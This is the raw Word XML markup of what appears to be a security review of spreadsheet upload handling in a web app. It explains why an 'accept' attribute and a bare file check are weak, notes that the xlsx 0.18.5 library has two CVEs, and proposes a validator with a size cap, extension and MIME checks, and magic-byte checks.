                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">if </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>(!file</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">) </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">return;   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">               // &lt;- all of it</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1955" o:spid="_x0000_s1287" style="position:absolute;left:1007;top:10034;width:217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69550F9E"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1956" o:spid="_x0000_s1288" style="position:absolute;left:1007;top:11748;width:3766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14B3D9AA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">const workbook = </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>XLSX.read</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">(data, </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>{ type</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>: "array</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>" }</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1957" o:spid="_x0000_s1289" style="position:absolute;top:15430;width:3158;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tOxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/odlBG+6qeAj0VXEB3qsWrC9DdkxCc3OhuxqYn99tyD0Nh/fcxar1pTiQbUrLCt4G0YgiFOr&#10;C84UfFz2gxkI55E1lpZJwZMcrJbdzgITbRs+0ePsMxFC2CWoIPe+SqR0aU4G3dBWxIG72dqgD7DO&#10;pK6xCeGmlKMomkiDBYeGHCva5JR+n+9GwWFWrT+P9qfJyt3X4fp+jbeX2CvV77XrOQhPrf8Xv9xH&#10;HebH4yn8fRNOkMtfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHUOS07EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="14AD2B36" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">The </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1958" o:spid="_x0000_s1290" style="position:absolute;left:2381;top:15246;width:14478;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="14478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NgxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;EMXvhX6HMIXealaholujiFAQevIfpbdhM90su5lsk6jbb+8cBG8zvDfv/WaxGnynLhRTE9jAeFSA&#10;Iq6Cbbg2cDx8vs1ApYxssQtMBv4pwWr5/LTA0oYr7+iyz7WSEE4lGnA596XWqXLkMY1CTyzab4ge&#10;s6yx1jbiVcJ9pydFMdUeG5YGhz1tHFXt/uwNbAqMf9+Hc2p/cN7MTm3u3Zc15vVlWH+AyjTkh/l+&#10;vbWCP38XXPlGRtDLGwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDFCmNgxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l1438275,v2630,,4875,930,6735,2791c1446870,4651,1447800,6896,1447800,9525r,123825c1447800,135979,1446870,138224,1445010,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1447800,142875"/>
                </v:shape>
                <v:rect id="Rectangle 1959" o:spid="_x0000_s1291" style="position:absolute;left:2644;top:15483;width:18605;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309B7638" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>accept=".xlsx,.xls,.csv"</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1960" o:spid="_x0000_s1292" style="position:absolute;left:16903;top:15430;width:57293;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140D3EA9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> attribute looks like a control but is a file-picker hint, bypassed by drag-and-drop or</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1961" o:spid="_x0000_s1293" style="position:absolute;top:17145;width:35355;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678EF055" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">renaming. Arbitrary bytes of arbitrary size reached </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1962" o:spid="_x0000_s1294" style="position:absolute;left:26574;top:17056;width:6954;height:1334;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zwwxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X+h+WKXiru+agNbqKFApVCMXHQW9Ddkyi2dmQ3WrSX98tFLzNx/ec+bKztbhR6yvHGkZDBYI4&#10;d6biQsNh//H6BsIHZIO1Y9LQk4fl4vlpjqlxd97SbRcKEUPYp6ihDKFJpfR5SRb90DXEkTu71mKI&#10;sC2kafEew20tE6XG0mLFsaHEht5Lyq+7b6vh66Am/eVofprNts6yTJ2SXq21Hrx0qxmIQF14iP/d&#10;nybOn44T+PsmniAXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQC73zwwxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l685800,v2631,,4876,930,6735,2778c694395,4638,695325,6883,695325,9525r,114300c695325,126454,694395,128699,692535,130559v-1859,1861,-4104,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6883,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695325,133350"/>
                </v:shape>
                <v:rect id="Rectangle 1963" o:spid="_x0000_s1295" style="position:absolute;left:26853;top:17293;width:8527;height:1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28D9F338" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>xlsx@0.18.5</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1964" o:spid="_x0000_s1296" style="position:absolute;left:33535;top:17145;width:13069;height:1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14:paraId="617AAE43" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> with its two CVEs.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A276FCB" w14:textId="77777777" w:rsidR="008C216B" w:rsidRDefault="008C216B">
      <w:pPr>
        <w:spacing w:after="37" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5006C4F4" w14:textId="7B30CCA2" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="37" w:line="259" w:lineRule="auto"/>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A shared validator applied to all four paths: presence, 10 MB cap, extension allow-list, MIME check, and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>magic bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBE9796" w14:textId="5B19DA26" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="41" w:line="259" w:lineRule="auto"/>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6000" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="674A5C68" wp14:editId="2AC7F399">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4818757</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18856</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="342900" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27454" name="Group 27454"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="342900" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="342900" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1969" name="Shape 1969"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="342900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338251" y="930"/>
                                  <a:pt x="340110" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4651"/>
                                  <a:pt x="342900" y="6896"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="135992"/>
                                  <a:pt x="341970" y="138224"/>
                                  <a:pt x="340110" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338251" y="141945"/>
                                  <a:pt x="336005" y="142875"/>
                                  <a:pt x="333375"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54" style="width:27pt;height:11.25pt;position:absolute;z-index:-2147483511;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:379.43pt;mso-position-vertical-relative:text;margin-top:-1.4848pt;" coordsize="3429,1428">
                <v:shape id="Shape 1969" style="position:absolute;width:3429;height:1428;left:0;top:0;" coordsize="342900,142875" path="m9525,0l333375,0c336005,0,338251,930,340110,2791c341970,4651,342900,6896,342900,9525l342900,133350c342900,135992,341970,138224,340110,140084c338251,141945,336005,142875,333375,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135992,0,133350l0,9525c0,6896,930,4651,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7024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53D90B0C" wp14:editId="4889BCBA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5752206</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-18856</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="342900" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27455" name="Group 27455"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="342900" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="342900" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1972" name="Shape 1972"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="342900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338251" y="930"/>
                                  <a:pt x="340111" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4651"/>
                                  <a:pt x="342900" y="6896"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="135992"/>
                                  <a:pt x="341970" y="138224"/>
                                  <a:pt x="340111" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338251" y="141945"/>
                                  <a:pt x="336005" y="142875"/>
                                  <a:pt x="333375" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135992"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4651"/>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55" style="width:27pt;height:11.25pt;position:absolute;z-index:-2147483508;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:452.93pt;mso-position-vertical-relative:text;margin-top:-1.4848pt;" coordsize="3429,1428">
                <v:shape id="Shape 1972" style="position:absolute;width:3429;height:1428;left:0;top:0;" coordsize="342900,142875" path="m9526,0l333375,0c336005,0,338251,930,340111,2791c341970,4651,342900,6896,342900,9525l342900,133350c342900,135992,341970,138224,340111,140084c338251,141945,336005,142875,333375,142875l9526,142875c6895,142875,4650,141945,2790,140084c930,138224,0,135992,1,133350l1,9525c0,6896,930,4651,2790,2791c4650,930,6895,0,9526,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> only </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an attacker cannot rename their way past, and why the function is async. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.xlsx</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> must start </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>50 4B</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ZIP),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FE7827" w14:textId="5A296B39" w:rsidR="00345BB3" w:rsidRDefault="008125F0" w:rsidP="008C216B">
      <w:pPr>
        <w:spacing w:after="101"/>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8048" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6719FE97" wp14:editId="6B48CA95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19984</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1714500" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27456" name="Group 27456"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1714500" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1714500" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1975" name="Shape 1975"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4651"/>
                                  <a:pt x="285750" y="6896"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135992"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141945"/>
                                  <a:pt x="278855" y="142875"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>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1978" name="Shape 1978"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="323850" y="0"/>
                            <a:ext cx="1390650" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1390650" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1381125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1383755" y="0"/>
                                  <a:pt x="1386000" y="930"/>
                                  <a:pt x="1387860" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1389720" y="4651"/>
                                  <a:pt x="1390650" y="6896"/>
                                  <a:pt x="1390650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1390650" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1390650" y="135992"/>
                                  <a:pt x="1389720" y="138224"/>
                                  <a:pt x="1387860" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1386000" y="141945"/>
                                  <a:pt x="1383755" y="142875"/>
                                  <a:pt x="1381125"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56" style="width:135pt;height:11.25pt;position:absolute;z-index:-2147483504;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-1.57361pt;" coordsize="17145,1428">
                <v:shape id="Shape 1975" style="position:absolute;width:2857;height:1428;left:0;top:0;" coordsize="285750,142875" path="m9525,0l276225,0c278855,0,281100,930,282960,2791c284820,4651,285750,6896,285750,9525l285750,133350c285750,135992,284820,138224,282960,140084c281100,141945,278855,142875,276225,142875l9525,142875c6895,142875,4650,141945,2790,140084l0,133350l0,9525l2790,2791c4650,930,6895,0,9525,0x">
